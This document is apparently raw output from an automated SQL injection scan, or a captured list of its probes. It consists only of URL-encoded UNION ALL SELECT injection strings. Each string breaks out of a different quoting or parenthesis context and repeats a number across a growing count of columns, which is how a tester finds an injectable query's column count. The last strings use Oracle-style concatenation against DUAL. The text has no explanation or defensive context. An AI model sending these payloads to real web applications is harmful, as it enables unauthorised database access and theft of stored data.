-5075%22%29%29%29%20UNION%20ALL%20SELECT%204701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%23 -5828%22%29%29%29%20UNION%20ALL%20SELECT%206377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%23 -7685%22%29%29%29%20UNION%20ALL%20SELECT%208466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%2C8466%23 -4828%22%29%29%29%20UNION%20ALL%20SELECT%201715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%2C1715%23 -5858%22%20UNION%20ALL%20SELECT%209131%2C9131%2C9131%2C9131%2C9131%2C9131%2C9131%2C9131%2C9131%2C9131%2C9131%23 -5834%22%20UNION%20ALL%20SELECT%208059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%2C8059%23 -1239%22%20UNION%20ALL%20SELECT%207186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%2C7186%23 -3727%22%20UNION%20ALL%20SELECT%203366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%23 -2674%22%20UNION%20ALL%20SELECT%204173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%2C4173%23 -1079%22%20UNION%20ALL%20SELECT%205050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%2C5050%23 -7399%22%20UNION%20ALL%20SELECT%206848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%2C6848%23 -6339%22%20UNION%20ALL%20SELECT%205255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%23 -8803%22%20UNION%20ALL%20SELECT%201564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%2C1564%23 -5218%22%20UNION%20ALL%20SELECT%204863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%2C4863%23 -2009%25%27%29%20UNION%20ALL%20SELECT%206376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%2C6376%23 -4914%25%27%29%20UNION%20ALL%20SELECT%203063%2C3063%2C3063%2C3063%2C3063%2C3063%2C3063%2C3063%2C3063%2C3063%2C3063%2C3063%23 -7108%25%27%29%20UNION%20ALL%20SELECT%201575%2C1575%2C1575%2C1575%2C1575%2C1575%2C1575%2C1575%2C1575%2C1575%2C1575%2C1575%2C1575%23 -3822%25%27%29%20UNION%20ALL%20SELECT%201378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%23 -6826%25%27%29%20UNION%20ALL%20SELECT%205833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%2C5833%23 -5352%25%27%29%20UNION%20ALL%20SELECT%207588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%2C7588%23 -5240%25%27%29%20UNION%20ALL%20SELECT%207084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%2C7084%23 -4357%25%27%29%20UNION%20ALL%20SELECT%204355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%2C4355%23 -2345%25%27%29%20UNION%20ALL%20SELECT%203074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%2C3074%23 -7844%25%27%29%20UNION%20ALL%20SELECT%208243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%2C8243%23 -7205%25%27%29%29%20UNION%20ALL%20SELECT%205910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%2C5910%23 -5436%25%27%29%29%20UNION%20ALL%20SELECT%207394%2C7394%2C7394%2C7394%2C7394%2C7394%2C7394%2C7394%2C7394%2C7394%2C7394%2C7394%23 -8871%25%27%29%29%20UNION%20ALL%20SELECT%205182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%2C5182%23 -5461%25%27%29%29%20UNION%20ALL%20SELECT%209698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%2C9698%23 -5359%25%27%29%29%20UNION%20ALL%20SELECT%203625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%23 -7999%25%27%29%29%20UNION%20ALL%20SELECT%209888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%23 -1677%25%27%29%29%20UNION%20ALL%20SELECT%207183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%2C7183%23 -1479%25%27%29%29%20UNION%20ALL%20SELECT%206056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%2C6056%23 -5326%25%27%29%29%20UNION%20ALL%20SELECT%209536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%23 -3775%25%27%29%29%20UNION%20ALL%20SELECT%203618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%2C3618%23 -5256%25%27%29%29%29%20UNION%20ALL%20SELECT%205156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%23 -5649%25%27%29%29%29%20UNION%20ALL%20SELECT%209695%2C9695%2C9695%2C9695%2C9695%2C9695%2C9695%2C9695%2C9695%2C9695%2C9695%2C9695%23 -1412%25%27%29%29%29%20UNION%20ALL%20SELECT%201309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%2C1309%23 -3604%25%27%29%29%29%20UNION%20ALL%20SELECT%205625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%23 -4243%25%27%29%29%29%20UNION%20ALL%20SELECT%206589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%2C6589%23 -7738%25%27%29%29%29%20UNION%20ALL%20SELECT%201037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%2C1037%23 -4589%25%27%29%29%29%20UNION%20ALL%20SELECT%206352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%2C6352%23 -8662%25%27%29%29%29%20UNION%20ALL%20SELECT%205388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%2C5388%23 -8051%25%27%29%29%29%20UNION%20ALL%20SELECT%201437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%2C1437%23 -5886%25%27%29%29%29%20UNION%20ALL%20SELECT%204654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%2C4654%23 -4104%25%27%20UNION%20ALL%20SELECT%206182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%2C6182%23 -3198%25%27%20UNION%20ALL%20SELECT%204596%2C4596%2C4596%2C4596%2C4596%2C4596%2C4596%2C4596%2C4596%2C4596%2C4596%2C4596%23 -7850%25%27%20UNION%20ALL%20SELECT%205652%2C5652%2C5652%2C5652%2C5652%2C5652%2C5652%2C5652%2C5652%2C5652%2C5652%2C5652%2C5652%23 -7508%25%27%20UNION%20ALL%20SELECT%202839%2C2839%2C2839%2C2839%2C2839%2C2839%2C2839%2C2839%2C2839%2C2839%2C2839%2C2839%2C2839%2C2839%23 -2816%25%27%20UNION%20ALL%20SELECT%204671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%23 -1590%25%27%20UNION%20ALL%20SELECT%205250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%2C5250%23 -6951%25%27%20UNION%20ALL%20SELECT%203350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%2C3350%23 -2163%25%27%20UNION%20ALL%20SELECT%204350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%2C4350%23 -2978%25%27%20UNION%20ALL%20SELECT%201790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%2C1790%23 -8010%25%27%20UNION%20ALL%20SELECT%207670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%2C7670%23 -5083%00%27%29%20UNION%20ALL%20SELECT%204062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%2C4062%23 -8086%00%27%29%20UNION%20ALL%20SELECT%208495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%2C8495%23 -7769%00%27%29%20UNION%20ALL%20SELECT%208231%2C8231%2C8231%2C8231%2C8231%2C8231%2C8231%2C8231%2C8231%2C8231%2C8231%2C8231%2C8231%23 -2699%00%27%29%20UNION%20ALL%20SELECT%201089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%2C1089%23 -1385%00%27%29%20UNION%20ALL%20SELECT%201251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%2C1251%23 -3138%00%27%29%20UNION%20ALL%20SELECT%206582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%2C6582%23 -8787%00%27%29%20UNION%20ALL%20SELECT%205739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%2C5739%23 -7263%00%27%29%20UNION%20ALL%20SELECT%203511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%2C3511%23 -8176%00%27%29%20UNION%20ALL%20SELECT%209167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%2C9167%23 -2763%00%27%29%20UNION%20ALL%20SELECT%209944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%2C9944%23 -8992%00%27%20UNION%20ALL%20SELECT%207081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%2C7081%23 -8718%00%27%20UNION%20ALL%20SELECT%201844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%2C1844%23 -1054%00%27%20UNION%20ALL%20SELECT%206682%2C6682%2C6682%2C6682%2C6682%2C6682%2C6682%2C6682%2C6682%2C6682%2C6682%2C6682%2C6682%23 -2539%00%27%20UNION%20ALL%20SELECT%206639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%2C6639%23 -7421%00%27%20UNION%20ALL%20SELECT%208259%2C8259%2C8259%2C8259%2C8259%2C8259%2C8259%2C8259%2C8259%2C8259%2C8259%2C8259%2C8259%2C8259%2C8259%23 -8769%00%27%20UNION%20ALL%20SELECT%202935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%23 -1007%00%27%20UNION%20ALL%20SELECT%204817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%23 -3351%00%27%20UNION%20ALL%20SELECT%201307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%23 -8568%00%27%20UNION%20ALL%20SELECT%204300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%2C4300%23 -8360%00%27%20UNION%20ALL%20SELECT%201706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%2C1706%23 -5809%27%29%20WHERE%208636%3D8636%20UNION%20ALL%20SELECT%208636%2C8636%2C8636%2C8636%2C8636%2C8636%2C8636%2C8636%2C8636%2C8636%2C8636%23 -5075%27%29%20WHERE%209937%3D9937%20UNION%20ALL%20SELECT%209937%2C9937%2C9937%2C9937%2C9937%2C9937%2C9937%2C9937%2C9937%2C9937%2C9937%2C9937%23 -8768%27%29%20WHERE%201403%3D1403%20UNION%20ALL%20SELECT%201403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%2C1403%23 -5669%27%29%20WHERE%208925%3D8925%20UNION%20ALL%20SELECT%208925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%2C8925%23 -6878%27%29%20WHERE%207404%3D7404%20UNION%20ALL%20SELECT%207404%2C7404%2C7404%2C7404%2C7404%2C7404%2C7404%2C7404%2C7404%2C7404%2C7404%2C7404%2C7404%2C7404%2C7404%23 -8332%27%29%20WHERE%207495%3D7495%20UNION%20ALL%20SELECT%207495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%2C7495%23 -8702%27%29%20WHERE%208739%3D8739%20UNION%20ALL%20SELECT%208739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%2C8739%23 -7013%27%29%20WHERE%204820%3D4820%20UNION%20ALL%20SELECT%204820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%2C4820%23 -2394%27%29%20WHERE%201770%3D1770%20UNION%20ALL%20SELECT%201770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%2C1770%23 -5579%27%29%20WHERE%208473%3D8473%20UNION%20ALL%20SELECT%208473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%2C8473%23 -9663%22%29%20WHERE%203030%3D3030%20UNION%20ALL%20SELECT%203030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%23 -9807%22%29%20WHERE%208748%3D8748%20UNION%20ALL%20SELECT%208748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%2C8748%23 -8804%22%29%20WHERE%203227%3D3227%20UNION%20ALL%20SELECT%203227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%2C3227%23 -2443%22%29%20WHERE%201573%3D1573%20UNION%20ALL%20SELECT%201573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%2C1573%23 -9993%22%29%20WHERE%206910%3D6910%20UNION%20ALL%20SELECT%206910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%2C6910%23 -3520%22%29%20WHERE%202431%3D2431%20UNION%20ALL%20SELECT%202431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%2C2431%23 -7840%22%29%20WHERE%204184%3D4184%20UNION%20ALL%20SELECT%204184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%23 -6180%22%29%20WHERE%203655%3D3655%20UNION%20ALL%20SELECT%203655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%2C3655%23 -8969%22%29%20WHERE%201304%3D1304%20UNION%20ALL%20SELECT%201304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%2C1304%23 -2707%22%29%20WHERE%202314%3D2314%20UNION%20ALL%20SELECT%202314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%23 -6554%29%20WHERE%206157%3D6157%20UNION%20ALL%20SELECT%206157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%2C6157%23 -2588%29%20WHERE%202944%3D2944%20UNION%20ALL%20SELECT%202944%2C2944%2C2944%2C2944%2C2944%2C2944%2C2944%2C2944%2C2944%2C2944%2C2944%2C2944%23 -6342%29%20WHERE%201477%3D1477%20UNION%20ALL%20SELECT%201477%2C1477%2C1477%2C1477%2C1477%2C1477%2C1477%2C1477%2C1477%2C1477%2C1477%2C1477%2C1477%23 -3754%29%20WHERE%203856%3D3856%20UNION%20ALL%20SELECT%203856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%23 -9668%29%20WHERE%208303%3D8303%20UNION%20ALL%20SELECT%208303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%2C8303%23 -7733%29%20WHERE%205512%3D5512%20UNION%20ALL%20SELECT%205512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%2C5512%23 -9088%29%20WHERE%203728%3D3728%20UNION%20ALL%20SELECT%203728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%2C3728%23 -6783%29%20WHERE%202396%3D2396%20UNION%20ALL%20SELECT%202396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%2C2396%23 -9082%29%20WHERE%205627%3D5627%20UNION%20ALL%20SELECT%205627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%2C5627%23 -4979%29%20WHERE%203819%3D3819%20UNION%20ALL%20SELECT%203819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%2C3819%23 -4156%27%20WHERE%206841%3D6841%20UNION%20ALL%20SELECT%206841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%2C6841%23 -2756%27%20WHERE%206781%3D6781%20UNION%20ALL%20SELECT%206781%2C6781%2C6781%2C6781%2C6781%2C6781%2C6781%2C6781%2C6781%2C6781%2C6781%2C6781%23 -8582%27%20WHERE%208638%3D8638%20UNION%20ALL%20SELECT%208638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%2C8638%23 -8102%27%20WHERE%201043%3D1043%20UNION%20ALL%20SELECT%201043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%23 -2169%27%20WHERE%208947%3D8947%20UNION%20ALL%20SELECT%208947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%2C8947%23 -9354%27%20WHERE%201996%3D1996%20UNION%20ALL%20SELECT%201996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%2C1996%23 -4539%27%20WHERE%207125%3D7125%20UNION%20ALL%20SELECT%207125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%23 -6317%27%20WHERE%209327%3D9327%20UNION%20ALL%20SELECT%209327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%2C9327%23 -4012%27%20WHERE%207847%3D7847%20UNION%20ALL%20SELECT%207847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%2C7847%23 -5757%27%20WHERE%201319%3D1319%20UNION%20ALL%20SELECT%201319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%2C1319%23 -1792%22%20WHERE%205051%3D5051%20UNION%20ALL%20SELECT%205051%2C5051%2C5051%2C5051%2C5051%2C5051%2C5051%2C5051%2C5051%2C5051%2C5051%23 -8997%22%20WHERE%201885%3D1885%20UNION%20ALL%20SELECT%201885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%23 -8796%22%20WHERE%202855%3D2855%20UNION%20ALL%20SELECT%202855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%23 -3205%22%20WHERE%206788%3D6788%20UNION%20ALL%20SELECT%206788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%2C6788%23 -1643%22%20WHERE%203429%3D3429%20UNION%20ALL%20SELECT%203429%2C3429%2C3429%2C3429%2C3429%2C3429%2C3429%2C3429%2C3429%2C3429%2C3429%2C3429%2C3429%2C3429%2C3429%23 -1265%22%20WHERE%207891%3D7891%20UNION%20ALL%20SELECT%207891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%23 -8779%22%20WHERE%206963%3D6963%20UNION%20ALL%20SELECT%206963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%2C6963%23 -4059%22%20WHERE%203532%3D3532%20UNION%20ALL%20SELECT%203532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%2C3532%23 -6403%22%20WHERE%205890%3D5890%20UNION%20ALL%20SELECT%205890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%23 -8558%22%20WHERE%204671%3D4671%20UNION%20ALL%20SELECT%204671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%2C4671%23 -9356%20WHERE%203808%3D3808%20UNION%20ALL%20SELECT%203808%2C3808%2C3808%2C3808%2C3808%2C3808%2C3808%2C3808%2C3808%2C3808%2C3808%23 -4198%20WHERE%209781%3D9781%20UNION%20ALL%20SELECT%209781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%23 -9059%20WHERE%207711%3D7711%20UNION%20ALL%20SELECT%207711%2C7711%2C7711%2C7711%2C7711%2C7711%2C7711%2C7711%2C7711%2C7711%2C7711%2C7711%2C7711%23 -2564%20WHERE%203683%3D3683%20UNION%20ALL%20SELECT%203683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%2C3683%23 -9966%20WHERE%208693%3D8693%20UNION%20ALL%20SELECT%208693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%23 -4062%20WHERE%209758%3D9758%20UNION%20ALL%20SELECT%209758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%2C9758%23 -9311%20WHERE%204594%3D4594%20UNION%20ALL%20SELECT%204594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%2C4594%23 -1816%20WHERE%206442%3D6442%20UNION%20ALL%20SELECT%206442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%2C6442%23 -5773%20WHERE%209502%3D9502%20UNION%20ALL%20SELECT%209502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%2C9502%23 -3369%20WHERE%206703%3D6703%20UNION%20ALL%20SELECT%206703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%2C6703%23 -4771%27%7C%7C%28SELECT%20%27iBdJ%27%20FROM%20DUAL%20WHERE%206568%3D6568%20UNION%20ALL%20SELECT%206568%2C6568%2C6568%2C6568%2C6568%2C6568%2C6568%2C6568%2C6568%2C6568%2C6568%23 -1311%27%7C%7C%28SELECT%20%27zAaO%27%20FROM%20DUAL%20WHERE%208736%3D8736%20UNION%20ALL%20SELECT%208736%2C8736%2C8736%2C8736%2C8736%2C8736%2C8736%2C8736%2C8736%2C8736%2C8736%2C8736%23 -5177%27%7C%7C%28SELECT%20%27pFwi%27%20FROM%20DUAL%20WHERE%208079%3D8079%20UNION%20ALL%20SELECT%208079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%2C8079%23 